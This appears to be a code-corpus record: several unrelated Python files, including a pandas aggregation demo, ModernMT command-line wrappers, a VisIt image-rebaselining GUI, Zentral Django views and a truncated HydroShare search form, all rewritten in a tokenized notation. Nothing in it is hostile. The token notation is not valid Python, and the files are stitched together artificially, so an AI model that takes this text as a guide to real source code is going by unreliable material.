<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>print(pd.__version__)<line_sep># 1.0.0 print(pd.DataFrame.agg<is>pd.DataFrame.aggregate)<line_sep># True df=pd.DataFrame({'A':[0 1 2] 'B':[3 4 5]})<line_sep>print(df)<line_sep># A B # 0 0 3 # 1 1 4 # 2 2 5 print(df.agg(['sum' 'mean' 'min' 'max']))<line_sep># A B # sum 3.0 12.0 # mean 1.0 4.0 # min 0.0 3.0 # max 2.0 5.0 print(type(df.agg(['sum' 'mean' 'min' 'max'])))<line_sep># <class 'pandas.core.frame.DataFrame'> print(df.agg(['sum']))<line_sep># A B # sum 3 12 print(type(df.agg(['sum'])))<line_sep># <class 'pandas.core.frame.DataFrame'> print(df.agg('sum'))<line_sep># A 3 # B 12 # dtype: int64 print(type(df.agg('sum')))<line_sep># <class 'pandas.core.series.Series'> print(df.agg({'A':['sum' 'min' 'max'] 'B':['mean' 'min' 'max']}))<line_sep># A B # max 2.0 5.0 # mean NaN 4.0 # min 0.0 3.0 # sum 3.0 NaN print(df.agg({'A':'sum' 'B':'mean'}))<line_sep># A 3.0 # B 4.0 # dtype: float64 print(df.agg({'A':['sum'] 'B':['mean']}))<line_sep># A B # mean NaN 4.0 # sum 3.0 NaN print(df.agg({'A':['min' 'max'] 'B':'mean'}))<line_sep># A B # max 2.0 NaN # mean NaN 4.0 # min 0.0 NaN print(df.agg(['sum' 'mean' 'min' 'max'] axis=1))<line_sep># sum mean min max # 0 3.0 1.5 0.0 3.0 # 1 5.0 2.5 1.0 4.0 # 2 7.0 3.5 2.0 5.0 s=df['A']<line_sep>print(s)<line_sep># 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(s.agg(['sum' 'mean' 'min' 'max']))<line_sep># sum 3.0 # mean 1.0 # min 0.0 # max 2.0 # Name: A, dtype: float64 print(type(s.agg(['sum' 'mean' 'min' 'max'])))<line_sep># <class 'pandas.core.series.Series'> print(s.agg(['sum']))<line_sep># sum 3 # Name: A, dtype: int64 print(type(s.agg(['sum'])))<line_sep># <class 'pandas.core.series.Series'> print(s.agg('sum'))<line_sep># 3 print(type(s.agg('sum')))<line_sep># <class 'numpy.int64'> print(s.agg({'Total':'sum' 'Average':'mean' 'Min':'min' 'Max':'max'}))<line_sep># Total 3.0 # Average 1.0 # Min 0.0 # Max 2.0 # Name: A, dtype: float64 # print(s.agg({'NewLabel_1': ['sum', 'max'], 'NewLabel_2': ['mean', 'min']})) # SpecificationError: nested renamer is not supported print(df.agg(['mad' 'amax' 'dtype']))<line_sep># A B # mad 0.666667 0.666667 # amax 2 5 # dtype int64 int64 print(df['A'].mad())<line_sep># 0.6666666666666666 print(np.amax(df['A']))<line_sep># 2 print(df['A'].dtype)<line_sep># int64 # print(df.agg(['xxx'])) # AttributeError: 'xxx' is not a valid function for 'Series' object # print(df.agg('xxx')) # AttributeError: 'xxx' is not a valid function for 'DataFrame' object print(hasattr(pd.DataFrame '__array__'))<line_sep># True print(hasattr(pd.core.groupby.GroupBy '__array__'))<line_sep># False print(df.agg([np.sum max]))<line_sep># A B # sum 3 12 # max 2 5 print(np.sum(df['A']))<line_sep># 3 print(max(df['A']))<line_sep># 2 print(np.abs(df['A']))<line_sep># 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(df.agg([np.abs]))<line_sep># A B # absolute absolute # 0 0 3 # 1 1 4 # 2 2 5 # print(df.agg([np.abs, max])) # ValueError: cannot combine transform and aggregation operations <def_stmt>my_func x<block_start><return>min(x)/max(x)<block_end>print(df.agg([my_func <lambda>x:min(x)/max(x)]))<line_sep># A B # my_func 0.0 0.6 # <lambda> 0.0 0.6 print(df['A'].std())<line_sep># 1.0 print(df['A'].std(ddof=0))<line_sep># 0.816496580927726 print(df.agg(['std' <lambda>x:x.std(ddof=0)]))<line_sep># A B # std 1.000000 1.000000 # <lambda> 0.816497 0.816497 print(df.agg('std' ddof=0))<line_sep># A 0.816497 # B 0.816497 # dtype: float64 print(df.agg(['std'] ddof=0))<line_sep># A B # std 1.0 1.0 df_str=df.assign(C=['X' 'Y' 'Z'])<line_sep>print(df_str)<line_sep># A B C # 0 0 3 X # 1 1 4 Y # 2 2 5 Z # df_str['C'].mean() # TypeError: Could not convert XYZ to numeric print(df_str.agg(['sum' 'mean']))<line_sep># A B C # sum 3.0 12.0 XYZ # mean 1.0 4.0 NaN print(df_str.agg(['mean' 'std']))<line_sep># A B # mean 1.0 4.0 # std 1.0 1.0 print(df_str.agg(['sum' 'min' 'max']))<line_sep># A B C # sum 3 12 XYZ # min 0 3 X # max 2 5 Z print(df_str.select_dtypes(include='number').agg(['sum' 'mean']))<line_sep># A B # sum 3.0 12.0 # mean 1.0 4.0
<import_stmt>os<import_stmt>re<import_from_stmt>cli.mmt MMT_HOME_DIR MMT_LIB_DIR MMT_BIN_DIR MMT_JAR MMT_PLUGINS_JARS<import_from_stmt>cli.utils osutils<def_stmt>__get_java_version <block_start><try_stmt><block_start>stdout,stderr=osutils.shell_exec(['java' '-version'])<line_sep>java_output=stdout+'\n'+stderr<for_stmt>line java_output.split('\n')<block_start>tokens=line.split()<if_stmt>'version'<in>tokens<block_start>version=tokens[tokens.index('version')+1]<line_sep>version=version.strip('"')<if_stmt>version.startswith('1.')<block_start>version=version[2:]<block_end>version=re.match('^[0-9]+' version)<line_sep><return>int(version.group())<block_end><block_end><return><none><block_end><except_stmt>OSError<block_start><return><none><block_end><block_end>__java_version=__get_java_version()<assert_stmt>__java_version<is><not><none> 'missing Java executable, please check INSTALL.md'<assert_stmt>__java_version<g>7 'wrong version of Java: required Java 8 or higher'<def_stmt>mmt_env <block_start>llp=(MMT_LIB_DIR+os.pathsep+os.environ['LD_LIBRARY_PATH'])<if>'LD_LIBRARY_PATH'<in>os.environ<else>MMT_LIB_DIR<line_sep><return>dict(os.environ LD_LIBRARY_PATH=llp LC_ALL='C.UTF-8' LANG='C.UTF-8')<block_end><if_stmt>'MMT_HOME'<not><in>os.environ<block_start>os.environ['MMT_HOME']=MMT_HOME_DIR<block_end># - ModernMT CLI functions --------------------------------------------------------------------------------------------- <def_stmt>mmt_java main_class args=<none> * java_ops=<none> remote_debug=<false> max_heap_mb=<none> server=<false> logs_path=<none><block_start>java_ops=java_ops<or>[]<if_stmt>remote_debug<block_start>java_ops.append('-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005')<block_end><if_stmt>server<block_start>java_ops.append('-server')<if_stmt>max_heap_mb<is><not><none><block_start>java_ops.append('-Xms'+str(max_heap_mb)+'m')<line_sep>java_ops.append('-Xmx'+str(max_heap_mb)+'m')<block_end><if_stmt>logs_path<is><not><none><block_start>java_ops<augadd>['-XX:ErrorFile='+os.path.join(logs_path 'hs_err_pid%p.log')]<line_sep>java_ops<augadd>['-XX:+PrintGCDateStamps' '-verbose:gc' '-XX:+PrintGCDetails' '-Xloggc:'+os.path.join(logs_path 'gc.log')]<line_sep>java_ops<augadd>['-XX:+HeapDumpOnOutOfMemoryError' '-XX:HeapDumpPath='+logs_path]<block_end>java_ops<augadd>['-XX:+CMSClassUnloadingEnabled' '-XX:+UseConcMarkSweepGC' '-XX:+CMSParallelRemarkEnabled' '-XX:+UseCMSInitiatingOccupancyOnly' '-XX:CMSInitiatingOccupancyFraction=70' '-XX:+ScavengeBeforeFullGC' '-XX:+CMSScavengeBeforeRemark' '-XX:+CMSClassUnloadingEnabled' '-XX:+ExplicitGCInvokesConcurrentAndUnloadsClasses']<block_end><else_stmt><block_start><if_stmt>max_heap_mb<is><not><none><block_start>java_ops.append('-Xmx'+str(max_heap_mb)+'m')<block_end><block_end>classpath=':'.join([MMT_JAR]+MMT_PLUGINS_JARS)<line_sep>java_cmd=['java']+java_ops+['-cp' classpath '-Dmmt.home='+MMT_HOME_DIR '-Djava.library.path='+MMT_LIB_DIR main_class]<if_stmt>args<is><not><none><block_start>java_cmd<augadd>args<block_end><return>java_cmd<block_end><def_stmt>mmt_tmsclean src_lang tgt_lang in_path out_path out_format=<none> filters=<none><block_start>args=['-s' src_lang '-t' tgt_lang '--input' in_path '--output' out_path]<if_stmt>out_format<is><not><none><block_start>args<augadd>['--output-format' out_format]<block_end><if_stmt>filters<is><not><none><and>len(filters)<g>0<block_start>args<augadd>['--filters']+filters<block_end>extended_heap_mb=int(osutils.mem_size()<times>90/100)<line_sep>java_ops=['-DentityExpansionLimit=0' '-DtotalEntitySizeLimit=0' '-Djdk.xml.totalEntitySizeLimit=0']<line_sep>command=mmt_java('eu.modernmt.cli.CleaningPipelineMain' args max_heap_mb=extended_heap_mb java_ops=java_ops)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end><def_stmt>mmt_preprocess src_lang tgt_lang in_paths out_path dev_path=<none> test_path=<none> partition_size=<none> quiet=<false><block_start>args=['-s' src_lang '-t' tgt_lang '--output' out_path '--input']<if_stmt>isinstance(in_paths str)<block_start>in_paths=[in_paths]<block_end>args<augadd>in_paths<if_stmt>partition_size<is><not><none><block_start>args<augadd>['--size' str(partition_size)]<block_end><if_stmt>dev_path<is><not><none><block_start>args<augadd>['--dev' dev_path]<block_end><if_stmt>test_path<is><not><none><block_start>args<augadd>['--test' test_path]<block_end><if_stmt>quiet<block_start>args.append('--quiet')<block_end>command=mmt_java('eu.modernmt.cli.TrainingPipelineMain' args)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end><def_stmt>mmt_dedup src_lang tgt_lang in_path out_path length_threshold=<none> sort=<none><block_start>args=['-s' src_lang '-t' tgt_lang '--input' in_path '--output' out_path]<if_stmt>length_threshold<is><not><none><and>length_threshold<g>0<block_start>args<augadd>['-l' length_threshold]<block_end><if_stmt>sort<is><not><none><block_start>args<augadd>['--sort']+sort<block_end>command=mmt_java('eu.modernmt.cli.DeduplicationMain' args)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end># - Fastalign CLI functions -------------------------------------------------------------------------------------------- <def_stmt>fastalign_build src_lang tgt_lang in_path out_model iterations=<none> case_sensitive=<true> favor_diagonal=<true> log=<none><block_start>os.makedirs(out_model exist_ok=<true>)<line_sep>out_model=os.path.join(out_model '%s__%s.fam'%(src_lang tgt_lang))<if_stmt>log<is><none><block_start>log=osutils.DEVNULL<block_end>command=[os.path.join(MMT_BIN_DIR 'fa_build') '-s' src_lang '-t' tgt_lang '-i' in_path '-m' out_model]<if_stmt>iterations<is><not><none><block_start>command.extend(['-I' str(iterations)])<block_end><if_stmt><not>case_sensitive<block_start>command.append('--case-insensitive')<block_end><if_stmt><not>favor_diagonal<block_start>command.append('--no-favor-diagonal')<block_end>osutils.shell_exec(command stdout=log stderr=log env=mmt_env())<block_end><def_stmt>fastalign_score src_lang tgt_lang model_path in_path out_path=<none><block_start>model_path=os.path.join(model_path '%s__%s.fam'%(src_lang tgt_lang))<line_sep>command=[os.path.join(MMT_BIN_DIR 'fa_score') '-s' src_lang '-t' tgt_lang '-m' model_path '-i' in_path '-o' out_path<or>in_path]<line_sep>stdout,_=osutils.shell_exec(command env=mmt_env())<line_sep>result=dict()<for_stmt>line stdout.splitlines(keepends=<false>)<block_start>key,value=line.split('=' maxsplit=1)<line_sep>result[key]=float(value)<block_end><return>result['good_avg'] result['good_std_dev'] result['bad_avg'] result['bad_std_dev']<block_end>
<import_from_stmt>enum Enum<class_stmt>TradeStatus(Enum)<block_start>PENDING_ACCEPT=0<line_sep>PENDING_CONFIRM=1<line_sep>PENDING_CANCEL=2<line_sep>CANCELED=3<line_sep>CONFIRMED=4<line_sep>FAILED=5<block_end>
<import_stmt>filecmp<import_stmt>os<import_stmt>sys<import_stmt>shutil<import_stmt>subprocess<import_stmt>time<import_stmt>unittest<if_stmt>(sys.version_info<g>(3 0))<block_start><import_stmt>urllib.request urllib.parse urllib.error<block_end><else_stmt><block_start><import_stmt>urllib<block_end><import_from_stmt>optparse OptionParser<import_from_stmt>PyQt4 QtCore QtGui<line_sep>parser=OptionParser()<line_sep>parser.add_option("-r" "--root" dest="web_root" default="http://portal.nersc.gov/project/visit/" help="Root of web URL where baselines are")<line_sep>parser.add_option("-d" "--date" dest="web_date" help="Date of last good run, in YYMonDD form")<line_sep>parser.add_option("-m" "--mode" dest="mode" help="Mode to run in: serial, parallel, sr")<line_sep>parser.add_option("-w" "--web-url" dest="web_url" help="Manual URL specification; normally generated "<concat>"automatically based on (-r, -d, -m)")<line_sep>parser.add_option("-g" "--git" dest="git" action="store_true" help="Use git to ignore images with local modifications")<line_sep>parser.add_option("-s" "--svn" dest="svn" action="store_true" help="Use svn to ignore images with local modifications")<line_sep>(options args)=parser.parse_args()<if_stmt>options.web_url<is><not><none><block_start>uri=options.web_url<block_end><else_stmt><block_start>uri=options.web_root+options.web_date+"/"<line_sep>mode=""<if_stmt>options.mode<eq>"sr"<or>options.mode<eq>"scalable,parallel"<or>options.mode<eq>"scalable_parallel"<block_start>mode="davinci_scalable_parallel_icet"<block_end><else_stmt><block_start>mode="".join([s<for>s ("davinci_" options.mode)])<block_end>uri<augadd>mode+"/"<block_end>parser.destroy()<line_sep>print("uri:" uri)<class_stmt>MW(QtGui.QMainWindow)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QMainWindow.__init__(self parent)<block_end><block_end><def_stmt>real_dirname path<block_start>"""Python's os.path.dirname is not dirname."""<line_sep><return>path.rsplit('/' 1)[0]<block_end><def_stmt>real_basename path<block_start>"""Python's os.path.basename is not basename."""<if_stmt>path.rsplit('/' 1)[1]<is>''<block_start><return><none><block_end><return>path.rsplit('/' 1)[1]<block_end><def_stmt>baseline_current serial_baseline<block_start>"""Given the path to the serial baseline image, determine if there is a mode specific baseline. Return a 2-tuple of the baseline image and the path to the 'current' image."""<line_sep>dname=real_dirname(serial_baseline)<line_sep>bname=real_basename(serial_baseline)<line_sep>baseline=serial_baseline<if_stmt>options.mode<is><not><none># Check for a mode specific baseline. <block_start>mode_spec=os.path.join(dname+"/" options.mode+"/" bname)<if_stmt>os.path.exists(mode_spec)<block_start>baseline=mode_spec<block_end><block_end># `Current' image never has a mode-specific path; filename/dir is always # based on the serial baseline's directory. no_baseline=serial_baseline.split('/' 1)# path without "baseline/" current=os.path.join("current/" no_baseline[1])<line_sep><return>(baseline current)<block_end><def_stmt>mode_specific baseline<block_start>"""Given a baseline image path, return a path to the mode specific baseline, even if said baseline does not exist (yet)."""<if_stmt>options.mode<is><none><or>options.mode<eq>"serial"<block_start><return>baseline<block_end>dname=real_dirname(baseline)<line_sep>bname=real_basename(baseline)<if_stmt>options.mode<eq>"parallel"<block_start><if_stmt>baseline.find("/parallel")<ne>-1# It's already got parallel in the path; this IS a mode specific # baseline. <block_start><return>baseline<block_end><return>os.path.join(dname options.mode bname)<block_end><if_stmt>options.mode.find("scalable")<ne>-1<block_start><if_stmt>baseline.find("scalable_parallel")<ne>-1# Already is mode-specific. <block_start><return>baseline<block_end><return>os.path.join(dname "scalable_parallel" bname)<block_end># Ruh roh. options.mode must be garbage. <raise>NotImplementedError("Unknown mode '%s'"%options.mode)<block_end><def_stmt>local_modifications_git file<block_start>vcs_diff=subprocess.call(["git" "diff" "--quiet" file])<if_stmt>vcs_diff<eq>1<block_start><return><true><block_end><return><false><block_end><def_stmt>local_modifications_svn file<block_start>svnstat=subprocess.Popen("svn stat %s"%file shell=<true> stdout=subprocess.PIPE)<line_sep>diff=svnstat.communicate()[0]<if_stmt>diff<ne>''<block_start><return><true><block_end><return><false><block_end><def_stmt>local_modifications filepath<block_start>"""Returns true if the file has local modifications. Always false if the user did not supply the appropriate VCS option."""<if_stmt>options.git<block_start><return>local_modifications_git(filepath)<block_end><if_stmt>options.svn<block_start><return>local_modifications_svn(filepath)<block_end><return><false><block_end><def_stmt>equivalent baseline image<block_start>"""True if the files are the same."""<if_stmt><not>os.path.exists(image)<block_start><return><false><block_end># Note this is `shallow' by default, but that's fine for our usage. <return>filecmp.cmp(baseline image)<block_end><def_stmt>trivial_pass baseline image<block_start>"""True if we can determine that this image is OK without querying the network."""<line_sep><return>equivalent(baseline image)<or>local_modifications(baseline)<block_end><class_stmt>RebaselinePTests(unittest.TestCase)<block_start><def_stmt>test_dirname self<block_start>input_and_results=[("baseline/category/test/a.png" "baseline/category/test") ("b/c/t/q.png" "b/c/t") ("b/c/t/longfn.png" "b/c/t") ("b/c/t/" "b/c/t")]<for_stmt>tst input_and_results<block_start>self.assertEqual(real_dirname(tst[0]) tst[1])<block_end><block_end><def_stmt>test_basename self<block_start>input_and_results=[("baseline/category/test/a.png" "a.png") ("b/c/t/q.png" "q.png") ("b/c/t/longfn.png" "longfn.png") ("b/c/t/" <none>)]<for_stmt>tst input_and_results<block_start>self.assertEqual(real_basename(tst[0]) tst[1])<block_end><block_end><block_end><class_stmt>Image(QtGui.QWidget)<block_start><def_stmt>__init__ self path parent=<none><block_start>self._filename=path<line_sep>self._parent=parent<line_sep>self._display=QtGui.QLabel(self._parent)<line_sep>self._load()<block_end><def_stmt>_load self<block_start>pixmap=QtGui.QPixmap(300 300)<line_sep>pixmap.load(self._filename)<line_sep>self._display.resize(pixmap.size())<line_sep>self._display.setPixmap(pixmap)<block_end><def_stmt>widget self<block_start><return>self._display<block_end><def_stmt>width self<block_start><return>self._display.width()<block_end><def_stmt>height self<block_start><return>self._display.height()<block_end><def_stmt>update self path<block_start>self._filename=path<line_sep>self._load()<block_end><block_end><class_stmt>Layout(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QWidget.__init__(self parent)<line_sep>self._mainwin=parent<line_sep>self._mainwin.statusBar().insertPermanentWidget(0 QtGui.QLabel())<line_sep>self.status("Initializing...")<line_sep>quit=QtGui.QPushButton('Quit' self)<line_sep>quit.setMaximumWidth(80)<if_stmt>parent<is><none><block_start>parent=self<block_end>parent.connect(quit QtCore.SIGNAL('clicked()') QtGui.qApp QtCore.SLOT('quit()'))<line_sep>parent.connect(self QtCore.SIGNAL('closeApp()') self._die)<line_sep>self._init_signals()<line_sep>self._bugs=[]# list which keeps track of which images we think are bugs. # guess an initial size; we don't know a real size until we've downloaded # images. self.resize_this_and_mainwin(600 600)<line_sep>self.setFocusPolicy(QtCore.Qt.StrongFocus)<line_sep>self.setFocus()<line_sep>self._baseline=<none><line_sep>self._current=<none><line_sep>self._diff=<none><line_sep>self._images=[<none> <none> <none>]<line_sep>self._next_set_of_images()<line_sep>self._images[0]=Image(self._baseline self)<line_sep>self._images[1]=Image(self._current self)<line_sep>self._images[2]=Image(self._diff self)<line_sep>grid=QtGui.QGridLayout()<line_sep>label_baseline=QtGui.QLabel(grid.widget())<line_sep>label_current=QtGui.QLabel(grid.widget())<line_sep>label_diff=QtGui.QLabel(grid.widget())<line_sep>label_baseline.setText("Baseline image:")<line_sep>label_current.setText("Davinci's current:")<line_sep>label_diff.setText("difference between them:")<line_sep>label_baseline.setMaximumSize(QtCore.QSize(160 35))<line_sep>label_current.setMaximumSize(QtCore.QSize(160 35))<line_sep>label_diff.setMaximumSize(QtCore.QSize(200 35))<line_sep>label_directions=QtGui.QLabel(grid.widget())<line_sep>label_directions.setText("Keyboard shorcuts:\n\n"<concat>"y: yes, rebaseline\n"<concat>"n: no, current image is wrong\n"<concat>"u: unknown, I can't/don't want to decide now\n"<concat>"q: quit")<line_sep>label_directions.setMaximumSize(QtCore.QSize(300 300))<line_sep>grid.addWidget(label_baseline 0 0)<line_sep>grid.addWidget(label_current 0 1)<line_sep>grid.addWidget(self._images[0].widget() 1 0)<line_sep>grid.addWidget(self._images[1].widget() 1 1)<line_sep>grid.addWidget(label_diff 2 0)<line_sep>grid.addWidget(quit 2 1)<line_sep>grid.addWidget(self._images[2].widget() 3 0)<line_sep>grid.addWidget(label_directions 3 1)<line_sep>rows=((0 (label_baseline label_current)) (1 (self._images[0] self._images[1])) (2 (label_diff quit)) (3 (self._images[2] label_directions)))<line_sep>cols=((0 (label_baseline self._images[0] label_diff self._images[2])) (1 (label_current self._images[1] quit label_directions)))<for_stmt>r rows<block_start>grid.setRowMinimumHeight(r[0] max([x.height()<for>x r[1]]))<block_end><for_stmt>c cols<block_start>grid.setColumnMinimumWidth(c[0] max([x.height()<for>x c[1]]))<block_end>self.setLayout(grid)<line_sep>self.resize_this_and_mainwin(self.calc_width() self.calc_height())<line_sep>self.show()<line_sep>self.setFocus()<block_end><def_stmt>resize_this_and_mainwin self w h<block_start>self.resize(w h)<line_sep># make sure it can't shrink too much self._mainwin.setMinimumWidth(w)<line_sep>self._mainwin.setMinimumHeight(h+30)# +30: for the status bar # try not to resize the mainwin if we don't need to; it's annoying. cur_w=self._mainwin.width()<line_sep>cur_h=self._mainwin.height()<line_sep>self._mainwin.resize(max(w cur_w) max(h cur_h))<line_sep>self._mainwin.update()<block_end><def_stmt>_die self<block_start>print("You thought these test results were bugs:")<for_stmt>f self._bugs<block_start>print("\t" f)<block_end>self._mainwin.close()<block_end><def_stmt>calc_width self<block_start>w=0<for_stmt>col range(0 self.layout().columnCount())<block_start>w<augadd>self.layout().columnMinimumWidth(col)<block_end><return>w<block_end><def_stmt>calc_height self<block_start>h=0<for_stmt>row range(0 self.layout().rowCount())<block_start>h<augadd>self.layout().rowMinimumHeight(row)<block_end><return>h<block_end><def_stmt>_update_images self<block_start>self._images[0].update(self._baseline)<line_sep>self._images[1].update(self._current)<line_sep>self._images[2].update(self._diff)<line_sep>self.resize_this_and_mainwin(self.calc_width() self.calc_height())<line_sep>self.update()<block_end><def_stmt>_rebaseline self<block_start>self.status("".join(["rebaselining " self._current "..."]))<line_sep>baseline=mode_specific(self._baseline)<line_sep>print("moving" self._current "on top of" baseline)<line_sep># We might be creating the first mode specific baseline for that test. If # so, it'll be missing the baseline specific dir. <if_stmt><not>os.path.exists(real_dirname(baseline))<block_start>print(real_dirname(baseline) "does not exist, creating...")<line_sep>os.mkdir(real_dirname(baseline))<block_end>shutil.move(self._current baseline)# do the rebaseline! self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>_ignore self<block_start>self.status("".join(["ignoring " self._baseline "..."]))<line_sep>self._bugs.append(self._baseline)<line_sep>self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>_unknown self<block_start>self.status("".join(["unknown " self._baseline "..."]))<line_sep>self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>status self msg<block_start>self._mainwin.statusBar().showMessage(msg)<line_sep>self._mainwin.statusBar().update()<line_sep>QtCore.QCoreApplication.processEvents()<block_end># we're single threaded <def_stmt>_next_set_of_images self<block_start>"""Figures out the next set of images to display. Downloads 'current' and 'diff' results from davinci. Sets filenames corresponding to baseline, current and diff images."""<if_stmt>self._baseline<is><none># first call, build list. <block_start>self._imagelist=[]<line_sep>print("Building initial file list... please wait.")<line_sep>self.status("Building initial file list... please wait.")<for_stmt>root,dirs,files os.walk("baseline")<block_start><for_stmt>f files<block_start>fn,ext=os.path.splitext(f)<if_stmt>ext<eq>".png"# In some cases, we can trivially reject a file. Don't bother # adding it to our list in that case. <block_start>serial_baseline_fn=os.path.join(root f)<line_sep># Does this path contain "parallel" or "scalable_parallel"? Then # we've got a mode specific baseline. We'll handle those based on # the serial filenames, so ignore them for now. <if_stmt>serial_baseline_fn.find("parallel")<ne>-1<block_start><continue><block_end>baseline_fn,current_fn=baseline_current(serial_baseline_fn)<assert_stmt>os.path.exists(baseline_fn)<if_stmt><not>trivial_pass(baseline_fn current_fn)<block_start>self._imagelist.append(baseline_fn)<block_end><block_end><block_end><block_end><block_end><try_stmt><block_start><while_stmt>len(self._imagelist)<g>0<block_start>self._baseline=self._imagelist.pop()<line_sep># now derive other filenames based on that one. filename=<none><line_sep># os.path.split fails if there's no / <try_stmt><block_start>filename=os.path.split(self._baseline)<line_sep>filename=filename[1]<block_end><except_stmt>AttributeError<as>e<block_start>self.status("No slash!")<line_sep><break><block_end>current_url=uri+"/c_"+filename<if_stmt>(sys.version_info<g>(3 0))<block_start>f,info=urllib.request.urlretrieve(current_url "local_current.png")<block_end><else_stmt><block_start>f,info=urllib.urlretrieve(current_url "local_current.png")<block_end>self.status("".join(["Checking " current_url "..."]))<if_stmt>info.getheader("Content-Type").startswith("text/html")# then it's a 404 or other error; skip this image. <block_start><continue><block_end><else_stmt># We found the next image. <block_start>self._current="local_current.png"<line_sep>diff_url=uri+"/d_"+filename<if_stmt>(sys.version_info<g>(3 0))<block_start>f,info=urllib.request.urlretrieve(diff_url "local_diff.png")<block_end><else_stmt><block_start>f,info=urllib.urlretrieve(diff_url "local_diff.png")<block_end><if_stmt>info.getheader("Content-Type").startswith("text/html")<block_start><raise>Exception("Could not download diff image.")<block_end>self._diff="local_diff.png"<line_sep>self.status("Waiting for input on "+filename)<line_sep><break><block_end><block_end><block_end><except_stmt>KeyError<as>e<block_start>print(e)<line_sep>print("No more images!")<line_sep>self.emit(QtCore.SIGNAL('closeApp()'))<block_end><block_end><def_stmt>_init_signals self<block_start>self.connect(self QtCore.SIGNAL('rebaseline()') self._rebaseline)<line_sep>self.connect(self QtCore.SIGNAL('ignore()') self._ignore)<line_sep>self.connect(self QtCore.SIGNAL('unknown()') self._unknown)<block_end><def_stmt>keyPressEvent self event<block_start><if_stmt>event.key()<eq>QtCore.Qt.Key_Q<block_start>self.emit(QtCore.SIGNAL('closeApp()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_Y<block_start>self.emit(QtCore.SIGNAL('rebaseline()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_N<block_start>self.emit(QtCore.SIGNAL('ignore()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_U<block_start>self.emit(QtCore.SIGNAL('unknown()'))<block_end>QtCore.QCoreApplication.processEvents()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>suite=unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)<line_sep>results=unittest.TextTestRunner(verbosity=2).run(suite)<if_stmt><not>results.wasSuccessful()<block_start>print("Tests failed, bailing.")<line_sep>sys.exit(1)<block_end>app=QtGui.QApplication(sys.argv)<line_sep>mw=MW()<line_sep>mw.show()<line_sep>mw.setWindowTitle("visit rebaseline -p")<line_sep>layout=Layout(mw)<line_sep>layout.show()<line_sep>sys.exit(app.exec_())<block_end>
<import_stmt>logging<import_from_stmt>django.apps apps<import_from_stmt>django.contrib.auth.mixins LoginRequiredMixin<import_from_stmt>django.http Http404 HttpResponse JsonResponse<import_from_stmt>django.views.generic TemplateView View<import_from_stmt>zentral.core.stores frontend_store<line_sep>logger=logging.getLogger("server.base.views")<class_stmt>HealthCheckView(View)<block_start><def_stmt>get self request *args **kwargs<block_start><return>HttpResponse('OK')<block_end><block_end><class_stmt>IndexView(LoginRequiredMixin TemplateView)<block_start>template_name="base/index.html"<def_stmt>get_context_data self **kwargs<block_start>context=super(IndexView self).get_context_data(**kwargs)<line_sep>app_list=[]<for_stmt>app_name,app_config apps.app_configs.items()<block_start><if_stmt>getattr(app_config "events_module" <none>)<is><not><none><block_start>app_list.append(app_name)<block_end><block_end>app_list.sort()<line_sep>context["apps"]=app_list<line_sep><return>context<block_end><block_end><class_stmt>AppHistogramDataView(LoginRequiredMixin View)<block_start>INTERVAL_DATE_FORMAT={"hour":"%H:%M" "day":"%d/%m" "week":"%d/%m" "month":"%m/%y" }<def_stmt>get self request *args **kwargs<block_start>app=kwargs['app']<try_stmt><block_start>zentral_app=apps.app_configs[app]<line_sep>search_dict=getattr(zentral_app.events_module "ALL_EVENTS_SEARCH_DICT")<block_end><except_stmt>(KeyError AttributeError)<block_start><raise>Http404<block_end>interval=kwargs["interval"]<try_stmt><block_start>date_format=self.INTERVAL_DATE_FORMAT[interval]<block_end><except_stmt>KeyError<block_start><raise>Http404<block_end>labels=[]<line_sep>event_count_data=[]<line_sep>unique_msn_data=[]<for_stmt>dt,event_count,unique_msn frontend_store.get_app_hist_data(interval int(kwargs["bucket_number"]) **search_dict)<block_start>labels.append(dt.strftime(date_format))<line_sep>event_count_data.append(event_count)<line_sep>unique_msn_data.append(unique_msn)<block_end>datasets={"event_count":{"label":"{} events".format(app) "backgroundColor":"rgba(122, 182, 160, 0.7)" "data":event_count_data} "unique_msn":{"label":"{} machines".format(app) "backgroundColor":"rgba(225, 100, 86, 0.7)" "data":unique_msn_data}}<line_sep><return>JsonResponse({"app":app "labels":labels "datasets":datasets})<block_end><block_end>
<import_from_stmt>haystack.forms FacetedSearchForm<import_from_stmt>haystack.query SQ<import_from_stmt>django forms<import_from_stmt>hs_core.discovery_parser ParseSQ MatchingBracketsNotFoundError FieldNotRecognizedError InequalityNotAllowedError MalformedDateError<line_sep>FACETS_TO_SHOW=['creator' 'contributor' 'owner' 'content_type' 'subject' 'availability']<class_stmt>DiscoveryForm(FacetedSearchForm)<block_start>SORT_ORDER_VALUES=('title' 'author' 'created' 'modified')<line_sep>SORT_ORDER_CHOICES=(('title' 'Title') ('author' 'First Author') ('created' 'Date Created') ('modified' 'Last Modified'))<line_sep>SORT_DIRECTION_VALUES=('' '-')<line_sep>SORT_DIRECTION_CHOICES=(('' 'Ascending') ('-' 'Descending'))<line_sep>NElat=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>NElng=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>SWlat=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>SWlng=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>start_date=forms.DateField(label='From Date' required=<false>)<line_sep>end_date=forms.DateField(label='To Date' required=<false>)<line_sep>coverage_type=forms.CharField(widget=forms.HiddenInput() required=<false>)<line_sep>sort_order=forms.CharField(label='Sort By:' widget=forms.Select(choices=SORT_ORDER_CHOICES) required=<false>)<line_sep>sort_direction=forms.CharField(label='Sort Direction:' widget=forms.Select(choices=SORT_DIRECTION_CHOICES) 